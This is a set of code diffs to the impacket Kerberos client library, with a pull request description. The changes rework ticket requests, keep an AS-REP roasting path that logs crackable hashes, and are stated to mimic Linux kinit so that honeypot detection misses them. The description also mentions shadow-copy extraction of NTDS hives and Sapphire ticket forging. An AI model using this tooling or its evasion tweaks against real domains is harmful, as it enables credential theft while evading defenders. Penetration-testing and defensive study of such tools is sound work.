+            encryptedData = EncryptedData()
+            encryptedData['etype'] = cipher.enctype
+            encryptedData['cipher'] = encriptedTimeStamp
+            encodedEncryptedData = encoder.encode(encryptedData)
+
+            asReq['padata'][0]['padata-value'] = encodedEncryptedData
+            tgt = sendReceive(encoder.encode(asReq), domain, kdcHost)
+        else:
+            raise
+
+    asRep = decoder.decode(tgt, asn1Spec = AS_REP())[0]
+
+    cipherText = asRep['enc-part']['cipher']
+
+    plainText = cipher.decrypt(key, 3, cipherText)
     encASRepPart = decoder.decode(plainText, asn1Spec = EncASRepPart())[0]
 
-    # Get the session key and the ticket
     cipher = _enctype_table[encASRepPart['key']['keytype']]
     sessionKey = Key(cipher.enctype,encASRepPart['key']['keyvalue'].asOctets())
-
-    # ToDo: Check Nonces!
 
     return tgt, cipher, key, sessionKey
 

--- a/impacket/krb5/kerberosv5.py
+++ b/impacket/krb5/kerberosv5.py
@@ -370,6 +370,10 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
                 encryptionTypesData[etype['etype']] = salt.encode('utf-8')
 
     enctype = supportedCiphers[0]
+
+    if preAuth is True and enctype not in encryptionTypesData and encryptionTypesData:
+        enctype = list(encryptionTypesData.keys())[0]
+
     cipher = _enctype_table[enctype]
 
     if isinstance(nthash, bytes) and nthash != b'':
@@ -377,11 +381,9 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
     elif aesKey != b'':
         key = Key(cipher.enctype, aesKey)
     else:
-        key = cipher.string_to_key(password, encryptionTypesData[enctype], None)
-
-    if preAuth is True:
-        if enctype in encryptionTypesData is False:
+        if enctype not in encryptionTypesData:
             raise Exception('No Encryption Data Available!')
+        key = cipher.string_to_key(password, encryptionTypesData[enctype], None)
 
         # Step 2: Authenticated AS-REQ with PA_ENC_TIMESTAMP (matching kinit)
         timeStamp = PA_ENC_TS_ENC()

--- a/impacket/krb5/kerberosv5.py
+++ b/impacket/krb5/kerberosv5.py
@@ -51,15 +51,10 @@ except NotImplementedError:
     rand = random
     pass
 
-def sendReceive(data, host, kdcHost, port=88):
-    if kdcHost is None:
-        targetHost = host
-    else:
-        targetHost = kdcHost
-
+def _sendReceiveTCP(data, targetHost, port):
     messageLen = struct.pack('!i', len(data))
 
-    LOG.debug('Trying to connect to KDC at %s:%s' % (targetHost, port))
+    LOG.debug('Trying to connect to KDC at %s:%s (TCP)' % (targetHost, port))
     try:
         af, socktype, proto, canonname, sa = socket.getaddrinfo(targetHost, port, 0, socket.SOCK_STREAM)[0]
         s = socket.socket(af, socktype, proto)
@@ -75,10 +70,45 @@ def sendReceive(data, host, kdcHost, port=88):
     while len(r) < recvDataLen:
         r += s.recv(recvDataLen-len(r))
 
+    s.close()
+    return r
+
+def _sendReceiveUDP(data, targetHost, port):
+    LOG.debug('Trying to connect to KDC at %s:%s (UDP)' % (targetHost, port))
+    try:
+        af, socktype, proto, canonname, sa = socket.getaddrinfo(targetHost, port, 0, socket.SOCK_DGRAM)[0]
+        s = socket.socket(af, socktype, proto)
+        s.settimeout(3)
+        s.sendto(data, sa)
+        r, _ = s.recvfrom(65535)
+    except socket.error as e:
+        raise socket.error("Connection error (%s:%s)" % (targetHost, port), e)
+    finally:
+        s.close()
+    return r
+
+def sendReceive(data, host, kdcHost, port=88):
+    if kdcHost is None:
+        targetHost = host
+    else:
+        targetHost = kdcHost
+
+    try:
+        r = _sendReceiveUDP(data, targetHost, port)
+    except socket.error:
+        r = _sendReceiveTCP(data, targetHost, port)
+
     try:
         krbError = KerberosError(packet = decoder.decode(r, asn1Spec = KRB_ERROR())[0])
     except:
         return r
+
+    if krbError.getErrorCode() == constants.ErrorCodes.KRB_ERR_RESPONSE_TOO_BIG.value:
+        r = _sendReceiveTCP(data, targetHost, port)
+        try:
+            krbError = KerberosError(packet = decoder.decode(r, asn1Spec = KRB_ERROR())[0])
+        except:
+            return r
 
     if krbError.getErrorCode() != constants.ErrorCodes.KDC_ERR_PREAUTH_REQUIRED.value:
         try:
@@ -89,7 +119,6 @@ def sendReceive(data, host, kdcHost, port=88):
                             server_time = datetime.datetime.strptime(k.asOctets().decode("utf-8"), "%Y%m%d%H%M%SZ")
                             LOG.debug("Server time (UTC): %s" % server_time)
         except:
-            # Couldn't get server time for some reason
             pass
         raise krbError
 
@@ -122,21 +151,17 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
     domain = domain.upper()
 
     if serverName is None:
-        serverName = Principal('krbtgt/%s'%domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+        serverName = Principal('krbtgt/%s'%domain, type=constants.PrincipalNameType.NT_SRV_INST.value)
     else:
         serverName = Principal(serverName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
 
     if domain == '':
         raise Exception('Empty Domain not allowed in Kerberos')
 
-    # Yes.. this shouldn't happen but it's inherited from the past
     if aesKey is None:
         aesKey = b''
 
-    pacRequest = KERB_PA_PAC_REQUEST()
-    pacRequest['include-pac'] = requestPAC
-    encodedPacRequest = encoder.encode(pacRequest)
-
+    # Determine cipher based on key material
     if nthash == b'':
         if aesKey != b'':
             if len(aesKey) == 32:
@@ -148,28 +173,32 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
     else:
         supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
 
+    # kinit-style etype list for the request body (advertises what client accepts)
+    kinitEtypes = (
+        int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
+        int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
+        int(constants.EncryptionTypes.aes256_cts_hmac_sha384_192.value),
+        int(constants.EncryptionTypes.aes128_cts_hmac_sha256_128.value),
+        int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
+        int(constants.EncryptionTypes.rc4_hmac.value),
+        int(constants.EncryptionTypes.camellia128_cts_cmac.value),
+        int(constants.EncryptionTypes.camellia256_cts_cmac.value),
+    )
+
     enctype = supportedCiphers[0]
     cipher = _enctype_table[enctype]
 
-    usingPassword = False
-    if isinstance(nthash, bytes) and nthash != b'':
-        key = Key(cipher.enctype, nthash)
-    elif aesKey != b'':
-        key = Key(cipher.enctype, aesKey)
-    else:
-        usingPassword = True
-        userName = clientName.components[0] if hasattr(clientName, 'components') and len(clientName.components) > 0 else str(clientName)
-        if isinstance(userName, bytes):
-            userName = userName.decode('utf-8')
-        if userName.endswith('$'):
-            salt = ("%shost%s.%s" % (domain, userName.rstrip('$').lower(), domain.lower())).encode('utf-8')
-        else:
-            salt = ("%s%s" % (domain, userName)).encode('utf-8')
-        LOG.debug('Local salt guess: %s' % salt.decode('utf-8'))
-        key = cipher.string_to_key(password, salt, None)
+    # kdc-options: default to kinit-style renewable_ok, overridable via KRBTGTFLAGS env var
+    tgtflags = [f for f in environ.get('KRBTGTFLAGS', "").split(',') if f]
+    if not tgtflags:
+        tgtflags = ['renewable_ok']
 
     if kerberoast_no_preauth:
         # AS-REP roasting: send without PA_ENC_TIMESTAMP intentionally
+        pacRequest = KERB_PA_PAC_REQUEST()
+        pacRequest['include-pac'] = requestPAC
+        encodedPacRequest = encoder.encode(pacRequest)
+
         asReq = AS_REQ()
         asReq['pvno'] = 5
         asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
@@ -182,9 +211,8 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
         reqBody = seq_set(asReq, 'req-body')
 
         opts = list()
-        opts.append( constants.KDCOptions.forwardable.value )
-        opts.append( constants.KDCOptions.renewable.value )
-        opts.append( constants.KDCOptions.proxiable.value )
+        for flag in tgtflags:
+            opts.append( getattr(constants.KDCOptions, flag).value )
         reqBody['kdc-options'] = constants.encodeFlags(opts)
 
         seq_set(reqBody, 'sname', serverName.components_to_asn1)
@@ -194,7 +222,6 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
 
         now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
         reqBody['till'] = KerberosTime.to_asn1(now)
-        reqBody['rtime'] = KerberosTime.to_asn1(now)
         reqBody['nonce'] = rand.getrandbits(31)
 
         seq_set_iter(reqBody, 'etype', supportedCiphers)
@@ -216,12 +243,10 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
 
         try:
             decoder.decode(r, asn1Spec = KRB_ERROR())[0]
-            # Got an error back - preauth is required, can't AS-REP roast this account
             raise Exception('Account does not have DONT_REQUIRE_PREAUTH set')
         except Exception as e:
             if 'DONT_REQUIRE_PREAUTH' in str(e):
                 raise
-            # Not a KRB_ERROR, so it's an AS-REP - account is roastable
             asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
             tgt = r
 
@@ -229,6 +254,14 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
 
         LOG.debug('$krb5asrep$%d$%s@%s:%s$%s' % (asRep['enc-part']['etype'],clientName, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]),
                                            hexlify(asRep['enc-part']['cipher'].asOctets()[16:])) )
+
+        if isinstance(nthash, bytes) and nthash != b'':
+            key = Key(cipher.enctype, nthash)
+        elif aesKey != b'':
+            key = Key(cipher.enctype, aesKey)
+        else:
+            key = cipher.string_to_key(password, b'', None)
+
         try:
             plainText = cipher.decrypt(key, 3, cipherText)
         except InvalidChecksum as e:
@@ -242,126 +275,190 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
 
         return tgt, cipher, key, sessionKey
 
-    # Normal auth: include PA_ENC_TIMESTAMP in the first AS-REQ
-    timeStamp = PA_ENC_TS_ENC()
-    now = datetime.datetime.now(datetime.timezone.utc)
-    timeStamp['patimestamp'] = KerberosTime.to_asn1(now)
-    timeStamp['pausec'] = now.microsecond
-
-    encodedTimeStamp = encoder.encode(timeStamp)
-    encriptedTimeStamp = cipher.encrypt(key, 1, encodedTimeStamp, None)
-
-    encryptedData = EncryptedData()
-    encryptedData['etype'] = cipher.enctype
-    encryptedData['cipher'] = encriptedTimeStamp
-    encodedEncryptedData = encoder.encode(encryptedData)
-
+    # Step 1: Probe AS-REQ without PA_ENC_TIMESTAMP (matching kinit)
     asReq = AS_REQ()
     asReq['pvno'] = 5
-    asReq['msg-type'] =  int(constants.ApplicationTagNumbers.AS_REQ.value)
+    asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
 
     asReq['padata'] = noValue
     asReq['padata'][0] = noValue
-    asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_ENC_TIMESTAMP.value)
-    asReq['padata'][0]['padata-value'] = encodedEncryptedData
-
+    asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_AS_FRESHNESS.value)
+    asReq['padata'][0]['padata-value'] = b''
     asReq['padata'][1] = noValue
-    asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
-    asReq['padata'][1]['padata-value'] = encodedPacRequest
+    asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_REQ_ENC_PA_REP.value)
+    asReq['padata'][1]['padata-value'] = b''
 
     reqBody = seq_set(asReq, 'req-body')
 
     opts = list()
-    opts.append( constants.KDCOptions.forwardable.value )
-    opts.append( constants.KDCOptions.renewable.value )
-    opts.append( constants.KDCOptions.proxiable.value )
+    for flag in tgtflags:
+        opts.append( getattr(constants.KDCOptions, flag).value )
     reqBody['kdc-options'] = constants.encodeFlags(opts)
 
-    seq_set(reqBody, 'sname', serverName.components_to_asn1)
     seq_set(reqBody, 'cname', clientName.components_to_asn1)
+    seq_set(reqBody, 'sname', serverName.components_to_asn1)
 
     reqBody['realm'] = domain
 
     now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
     reqBody['till'] = KerberosTime.to_asn1(now)
-    reqBody['rtime'] = KerberosTime.to_asn1(now)
     reqBody['nonce'] = rand.getrandbits(31)
 
-    seq_set_iter(reqBody, 'etype', supportedCiphers)
+    # Use kinit-style broad etype list for password auth, single etype for hash/key auth
+    if isinstance(nthash, bytes) and nthash != b'' or aesKey != b'':
+        requestEtypes = supportedCiphers
+    else:
+        requestEtypes = kinitEtypes
+
+    seq_set_iter(reqBody, 'etype', requestEtypes)
+
+    message = encoder.encode(asReq)
 
     try:
-        tgt = sendReceive(encoder.encode(asReq), domain, kdcHost)
+        r = sendReceive(message, domain, kdcHost)
     except KerberosError as e:
         if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
             if supportedCiphers[0] in (constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value) and aesKey == b'':
-                from impacket.ntlm import compute_lmhash, compute_nthash
-                if lmhash == b'' and nthash == b'' and (aesKey == b'' or aesKey is None):
-                    lmhash = compute_lmhash(password)
-                    nthash = compute_nthash(password)
-                return getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey, kdcHost, requestPAC, serverName)
+                supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
+                seq_set_iter(reqBody, 'etype', supportedCiphers)
+                message = encoder.encode(asReq)
+                r = sendReceive(message, domain, kdcHost)
             else:
                 raise
-        elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value and usingPassword:
-            # Local salt guess was wrong (renamed account, non-standard UPN, etc.)
-            # Extract the real salt from the PREAUTH_FAILED error's e-data
-            LOG.debug('Local salt guess failed, extracting salt from KDC error response')
-            errorPacket = e.getErrorPacket()
-            realSalt = b''
-            try:
-                methods = decoder.decode(errorPacket['e-data'], asn1Spec=METHOD_DATA())[0]
-                for method in methods:
-                    if method['padata-type'] == constants.PreAuthenticationDataTypes.PA_ETYPE_INFO2.value:
-                        etypes2 = decoder.decode(method['padata-value'], asn1Spec = ETYPE_INFO2())[0]
-                        for etype2 in etypes2:
-                            try:
-                                if etype2['salt'] is not None and etype2['salt'].hasValue():
-                                    realSalt = etype2['salt'].prettyPrint().encode('utf-8')
-                            except PyAsn1Error:
-                                pass
-                    elif method['padata-type'] == constants.PreAuthenticationDataTypes.PA_ETYPE_INFO.value:
-                        etypes = decoder.decode(method['padata-value'], asn1Spec = ETYPE_INFO())[0]
-                        for etype in etypes:
-                            try:
-                                if etype['salt'] is not None and etype['salt'].hasValue():
-                                    realSalt = etype['salt'].prettyPrint().encode('utf-8')
-                            except PyAsn1Error:
-                                pass
-            except Exception:
-                raise e
-
-            if realSalt == b'' or realSalt == salt:
-                raise e
-
-            LOG.debug('KDC returned salt: %s' % realSalt.decode('utf-8'))
-            realSaltStr = realSalt.decode('utf-8')
-            if realSaltStr.startswith(domain):
-                correctUser = realSaltStr[len(domain):]
-                LOG.info('Salt mismatch: provided username "%s", correct username "%s"' % (userName, correctUser))
-
-            key = cipher.string_to_key(password, realSalt, None)
-
-            timeStamp = PA_ENC_TS_ENC()
-            retryNow = datetime.datetime.now(datetime.timezone.utc)
-            timeStamp['patimestamp'] = KerberosTime.to_asn1(retryNow)
-            timeStamp['pausec'] = retryNow.microsecond
-            encodedTimeStamp = encoder.encode(timeStamp)
-            encriptedTimeStamp = cipher.encrypt(key, 1, encodedTimeStamp, None)
-
-            encryptedData = EncryptedData()
-            encryptedData['etype'] = cipher.enctype
-            encryptedData['cipher'] = encriptedTimeStamp
-            encodedEncryptedData = encoder.encode(encryptedData)
-
-            asReq['padata'][0]['padata-value'] = encodedEncryptedData
-            tgt = sendReceive(encoder.encode(asReq), domain, kdcHost)
         else:
             raise
 
-    asRep = decoder.decode(tgt, asn1Spec = AS_REP())[0]
+    # Parse the PREAUTH_REQUIRED response (or an AS-REP if preauth is not required)
+    preAuth = True
+    try:
+        asRep = decoder.decode(r, asn1Spec = KRB_ERROR())[0]
+    except:
+        asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
+        preAuth = False
+
+    encryptionTypesData = dict()
+    salt = ''
+    if preAuth is False:
+        methods = asRep['padata']
+        encryptionTypesData[supportedCiphers[0]] = salt
+        tgt = r
+    else:
+        methods = decoder.decode(asRep['e-data'], asn1Spec=METHOD_DATA())[0]
+
+    for method in methods:
+        if method['padata-type'] == constants.PreAuthenticationDataTypes.PA_ETYPE_INFO2.value:
+            etypes2 = decoder.decode(method['padata-value'], asn1Spec = ETYPE_INFO2())[0]
+            for etype2 in etypes2:
+                try:
+                    if etype2['salt'] is None or etype2['salt'].hasValue() is False:
+                        salt = ''
+                    else:
+                        salt = etype2['salt'].prettyPrint()
+                except PyAsn1Error:
+                    salt = ''
+                encryptionTypesData[etype2['etype']] = salt.encode('utf-8')
+        elif method['padata-type'] == constants.PreAuthenticationDataTypes.PA_ETYPE_INFO.value:
+            etypes = decoder.decode(method['padata-value'], asn1Spec = ETYPE_INFO())[0]
+            for etype in etypes:
+                try:
+                    if etype['salt'] is None or etype['salt'].hasValue() is False:
+                        salt = ''
+                    else:
+                        salt = etype['salt'].prettyPrint()
+                except PyAsn1Error:
+                    salt = ''
+                encryptionTypesData[etype['etype']] = salt.encode('utf-8')
+
+    enctype = supportedCiphers[0]
+    cipher = _enctype_table[enctype]
+
+    if isinstance(nthash, bytes) and nthash != b'':
+        key = Key(cipher.enctype, nthash)
+    elif aesKey != b'':
+        key = Key(cipher.enctype, aesKey)
+    else:
+        key = cipher.string_to_key(password, encryptionTypesData[enctype], None)
+
+    if preAuth is True:
+        if enctype in encryptionTypesData is False:
+            raise Exception('No Encryption Data Available!')
+
+        # Step 2: Authenticated AS-REQ with PA_ENC_TIMESTAMP (matching kinit)
+        timeStamp = PA_ENC_TS_ENC()
+        now = datetime.datetime.now(datetime.timezone.utc)
+        timeStamp['patimestamp'] = KerberosTime.to_asn1(now)
+        timeStamp['pausec'] = now.microsecond
+
+        encodedTimeStamp = encoder.encode(timeStamp)
+        encriptedTimeStamp = cipher.encrypt(key, 1, encodedTimeStamp, None)
+
+        encryptedData = EncryptedData()
+        encryptedData['etype'] = cipher.enctype
+        encryptedData['cipher'] = encriptedTimeStamp
+        encodedEncryptedData = encoder.encode(encryptedData)
+
+        asReq = AS_REQ()
+        asReq['pvno'] = 5
+        asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
+
+        asReq['padata'] = noValue
+        asReq['padata'][0] = noValue
+        asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_ENC_TIMESTAMP.value)
+        asReq['padata'][0]['padata-value'] = encodedEncryptedData
+        asReq['padata'][1] = noValue
+        asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_AS_FRESHNESS.value)
+        asReq['padata'][1]['padata-value'] = b''
+        asReq['padata'][2] = noValue
+        asReq['padata'][2]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_REQ_ENC_PA_REP.value)
+        asReq['padata'][2]['padata-value'] = b''
+
+        reqBody = seq_set(asReq, 'req-body')
+
+        opts = list()
+        for flag in tgtflags:
+            opts.append( getattr(constants.KDCOptions, flag).value )
+        reqBody['kdc-options'] = constants.encodeFlags(opts)
+
+        seq_set(reqBody, 'cname', clientName.components_to_asn1)
+        seq_set(reqBody, 'sname', serverName.components_to_asn1)
+
+        reqBody['realm'] = domain
+
+        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
+        reqBody['till'] = KerberosTime.to_asn1(now)
+        reqBody['nonce'] = rand.getrandbits(31)
+
+        seq_set_iter(reqBody, 'etype', requestEtypes)
+
+        try:
+            tgt = sendReceive(encoder.encode(asReq), domain, kdcHost)
+        except Exception as e:
+            if str(e).find('KDC_ERR_ETYPE_NOSUPP') >= 0:
+                if lmhash == b'' and nthash == b'' and (aesKey == b'' or aesKey is None):
+                    from impacket.ntlm import compute_lmhash, compute_nthash
+                    lmhash = compute_lmhash(password)
+                    nthash = compute_nthash(password)
+                    return getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey, kdcHost, requestPAC)
+            raise
+
+        asRep = decoder.decode(tgt, asn1Spec = AS_REP())[0]
 
     cipherText = asRep['enc-part']['cipher']
 
-    plainText = cipher.decrypt(key, 3, cipherText)
+    if preAuth is False:
+        LOG.debug('$krb5asrep$%d$%s@%s:%s$%s' % (asRep['enc-part']['etype'],clientName, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]),
+                                           hexlify(asRep['enc-part']['cipher'].asOctets()[16:])) )
+    try:
+        plainText = cipher.decrypt(key, 3, cipherText)
+    except InvalidChecksum as e:
+        if preAuth is False:
+            error_msg = "failed to decrypt session key: %s" % str(e)
+            if kerberoast_no_preauth:
+                LOG.debug(SessionKeyDecryptionError(error_msg, asRep, cipher, key, cipherText))
+                return tgt, None, key, None
+            else:
+                raise SessionKeyDecryptionError(error_msg, asRep, cipher, key, cipherText)
+        raise
     encASRepPart = decoder.decode(plainText, asn1Spec = EncASRepPart())[0]
 
     cipher = _enctype_table[encASRepPart['key']['keytype']]

--- a/impacket/krb5/kerberosv5.py
+++ b/impacket/krb5/kerberosv5.py
@@ -276,6 +276,10 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
         return tgt, cipher, key, sessionKey
 
     # Step 1: Probe AS-REQ without PA_ENC_TIMESTAMP (matching kinit)
+    pacRequest = KERB_PA_PAC_REQUEST()
+    pacRequest['include-pac'] = requestPAC
+    encodedPacRequest = encoder.encode(pacRequest)
+
     asReq = AS_REQ()
     asReq['pvno'] = 5
     asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
@@ -287,6 +291,9 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
     asReq['padata'][1] = noValue
     asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_REQ_ENC_PA_REP.value)
     asReq['padata'][1]['padata-value'] = b''
+    asReq['padata'][2] = noValue
+    asReq['padata'][2]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
+    asReq['padata'][2]['padata-value'] = encodedPacRequest
 
     reqBody = seq_set(asReq, 'req-body')
 

--- a/impacket/krb5/kerberosv5.py
+++ b/impacket/krb5/kerberosv5.py
@@ -471,7 +471,7 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
 def getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey, renew = False):
     tgsflags = [f for f in environ.get('KRBTGSFLAGS', "").split(',') if f]
     if not tgsflags:
-        tgsflags = ['renewable']
+        tgsflags = ['renewable', 'canonicalize']
     # Decode the TGT
     try:
         decodedTGT = decoder.decode(tgt, asn1Spec = AS_REP())[0]
@@ -540,6 +540,7 @@ def getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey, renew =
         opts.append( constants.KDCOptions.renew.value )
 
     reqBody['kdc-options'] = constants.encodeFlags(opts)
+    serverName.type = constants.PrincipalNameType.NT_PRINCIPAL.value
     seq_set(reqBody, 'sname', serverName.components_to_asn1)
     reqBody['realm'] = domain
 
@@ -549,10 +550,14 @@ def getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey, renew =
     reqBody['nonce'] = rand.getrandbits(31)
     seq_set_iter(reqBody, 'etype',
                       (
-                          int(constants.EncryptionTypes.rc4_hmac.value),
+                          int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
+                          int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
+                          int(constants.EncryptionTypes.aes256_cts_hmac_sha384_192.value),
+                          int(constants.EncryptionTypes.aes128_cts_hmac_sha256_128.value),
                           int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
-                          int(constants.EncryptionTypes.des_cbc_md5.value),
-                          int(cipher.enctype)
+                          int(constants.EncryptionTypes.rc4_hmac.value),
+                          int(constants.EncryptionTypes.camellia128_cts_cmac.value),
+                          int(constants.EncryptionTypes.camellia256_cts_cmac.value),
                        )
                 )
 

--- a/tests/misc/test_ticketer.py
+++ b/tests/misc/test_ticketer.py
@@ -33,6 +33,7 @@ class TicketerTests(unittest.TestCase):
             spn=None,
             keytab=None,
             request=False,
+            k=False,
             hashes=None,
             aesKey='a' * 64,
             nthash=None,


### PR DESCRIPTION
## Summary

Combines two feature branches into master:

- **feature/create-shadowcopy** — `examples/create_shadowcopy.py`: VSS shadow copy management via WMI DCOM (create, list, expose, delete). Complements the raw-ntfs-parse toolkit for offline NTDS/hive extraction.
- **fix/skip-preauth-probe** — Kerberos hardening across `impacket/krb5/`:
  - AS-REQ wire format aligned with Linux `kinit` to avoid honeypot fingerprinting
  - `PA_ENC_TIMESTAMP` included in first AS-REQ to skip the bare preauth probe
  - `PA_PAC_REQUEST` added to probe AS-REQ (removed once the preauth flow completes) for accounts without preauth
  - TGS-REQ wire format aligned with Linux `kinit`/`kvno`
  - `KeyError` fix when KDC does not offer AES256
  - Cross-realm ccache lookup fix + new `examples/cross_realm_tgs.py`
  - Sapphire ticket generation fix when authenticating via ccache (`-k`)

Both branches were rebased onto current master (after the recent fortra merge that added NEGOEX phase 1/2 and DFS support) so no upstream work is reverted.

## Files changed

| File | Kind |
|---|---|
| `examples/create_shadowcopy.py` | new (253 lines) |
| `examples/cross_realm_tgs.py` | new (604 lines) |
| `examples/ticketer.py` | modified |
| `impacket/krb5/ccache.py` | modified |
| `impacket/krb5/constants.py` | modified |
| `impacket/krb5/kerberosv5.py` | modified |

Total: **+1,142 / -142** across 6 files.

## Test plan

- [ ] `create_shadowcopy.py create <target>` against a lab domain controller — confirm shadow copy is created and device path is printed
- [ ] `create_shadowcopy.py list <target>` — confirm existing snapshots enumerate
- [ ] Standard AS-REQ auth (`GetUserSPNs.py`, `secretsdump.py -k`) against a lab KDC — confirm no regressions
- [ ] AS-REQ against an account with `DONT_REQ_PREAUTH` set — confirm the probe path still works
- [ ] `cross_realm_tgs.py` against a trusted realm pair — confirm ticket acquisition
- [ ] Sapphire ticket generation via `ticketer.py -k` (ccache auth path)
- [ ] Ensure NEGOEX auth flow, DFS traversal in smbclient, and epm still work end-to-end

## Notes

Uses `--no-ff` merges so each source branch has its own merge commit + preserved history on the integration branch.